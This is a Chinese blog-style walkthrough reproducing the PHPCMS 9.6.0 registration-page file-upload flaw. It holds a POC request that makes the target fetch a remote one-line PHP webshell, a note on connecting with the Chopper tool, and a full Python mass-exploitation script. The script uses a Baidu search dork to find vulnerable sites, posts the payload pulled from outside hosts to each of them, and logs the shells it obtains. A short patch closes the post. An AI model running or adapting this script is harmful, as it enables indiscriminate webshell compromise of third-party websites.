这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。
原文地址:https://www.t00ls.net/thread-39226-1-1.html
首先我们本地搭建一个phpcms9.6.0的环境
下载地址:http://www.mycodes.net/43/3365.htm
点击注册页面,进行抓包
在本地创建一个txt文本,写入一句话木马
POC
siteid=1&modelid=11&username=seven1&password=seven123456&email=seven@qq.com&info[content]=<img src=http://127.0.0.1/333.txt?.php#.jpg>&dosubmit=1&protocol=
修改抓包内容,添加POC
菜刀链接
---------------------------------------------------------------------------------------------------------------------------------
也可以用火狐插件执行POC
附上Akkuman 大牛写的批量脚本
说明:
依赖库的安装pip install requests
# -*- coding:utf-8 -*- '''
----------------------
Author : Akkuman
Blog : hacktech.cn
----------------------
''' import requests
from bs4 import BeautifulSoup
# from urlparse import unquote //Python2
# from urlparse import urlparse //Python2
from urllib.parse import quote
from urllib.parse import urlparse
from random import Random chars = 'qwertyuiopasdfghjklzxcvbnm0123456789' headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
} def parseBaidu(keyword, pagenum):
keywordsBaseURL = 'https://www.baidu.com/s?wd=' + str(quote(keyword)) + '&oq=' + str(quote(keyword)) + '&ie=utf-8' + '&pn='
pnum = 0
while pnum <= int(pagenum):
baseURL = keywordsBaseURL + str(pnum*10)
try:
request = requests.get(baseURL, headers=headers)
soup = BeautifulSoup(request.text, "html.parser")
for a in soup.select('div.c-container > h3 > a'):
url = requests.get(a['href'], headers=headers, timeout=7).url
yield url
except:
yield None
finally:
pnum += 1 def saveShell(shellUrl):
with open("webShell.txt","a+") as f:
f.write("[*]%s\n" % shellUrl) def main():
data = {
"siteid": "",
"modelid": "",
"username": "akkumandsad",
"password": "",
"email": "akkakkumafa@qq.com",
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0,普通一句话http://file.codecat.one/normalOneWord.txt
"info[content]": "<img src=http://7xusrl.com1.z0.glb.clouddn.com/bypassdog.txt?.php#.jpg>",
"dosubmit": "",
"protocol": "",
}
for crawlUrl in parseBaidu("inurl:index.php?m=member&c=index&a=register&siteid=1", 10):
try:
if crawlUrl:
rand_name = chars[Random().randint(0, len(chars) - 1)]
data["username"] = "akkuman_%s" % rand_name
data["email"] = "akkuman_%s@qq.com" % rand_name
host = urlparse(crawlUrl).scheme + "://" + urlparse(crawlUrl).hostname
url = host + "/index.php?m=member&c=index&a=register&siteid=1"
htmlContent = requests.post(url, data=data, timeout=10)
successUrl = ""
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
print("[*]Shell : %s" % successUrl)
saveShell(successUrl)
if successUrl == "":
print("[x]Failed : Failed to getshell.")
else:
continue
except:
print("Request Error") if __name__ == '__main__':
main()
------------------------------------------------------------------------------------------------------------------------------------------------------------------
修复方法:
打开phpcms\libs\classes\attachment.class.php
在168行代码下面添加如下代码
if(!stripos($ext,$filename)){
$arryfilename = explode("|", $ext);
foreach($arryfilename as $n=>$fn){
if($fn){
$filename = $fn;
continue;
}
}
}